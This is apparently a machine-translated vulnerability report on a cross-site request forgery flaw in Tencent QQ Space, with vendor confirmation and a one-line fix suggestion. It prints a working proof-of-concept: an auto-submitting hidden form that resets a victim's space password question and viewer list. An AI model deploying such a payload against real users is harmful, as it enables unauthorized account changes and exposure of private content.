Tencent QQ space CSRF vulnerability and repair

Vulnerability Author: blue
Submission time: Public time:
Vulnerability Type: CSRF hazard level: high vulnerability status: confirmed by the vendor
Brief description:
When the target user logs on to the QQ space, he or she can trick the user into opening a webpage containing the CSRF code to perform certain operations. He or she can use the space where the user can view the password, and so on ~ _ ^. Enter the password space as an example.

Detailed description:
Before testing:

After the user is tempted to access the page (the visitor is allowed to add and the password is changed ):

 

Proof of vulnerability:
Csrf form sample code:
<Form action = "http://w.qzone.qq.com/cgi-bin/right/set_entryright.cgi" method = "post">
<Input type = "hidden" name = "seq" value = "335"/>
<Input type = "hidden" name = "uinlist" value = "***"/> <! -- Allow viewing the user list -->
<Input type = "hidden" name = "entryq1" value = "you know? "/> <! -- Question 1 -->
<Input type = "hidden" name = "entrya1" value = "blue"/> <! -- Answer 1 -->
<Input type = "hidden" name = "bit" value = "3"/>
<Input type = "hidden" name = "flag" value = "3"/>
<Input type = "hidden" name = "uin" value = "***"/> <! -- QQ number of the target user -->
</Form>
<Script type = "text/javascript">
Document. forms [0]. submit ();
</Script>

Solution:
Add a verification mechanism, or enter a password when changing the settings...

Vulnerability response
Vendor response:
Hazard level: Medium

Vulnerability Rank: 5

Confirmation time:

Vendor reply:
Thanks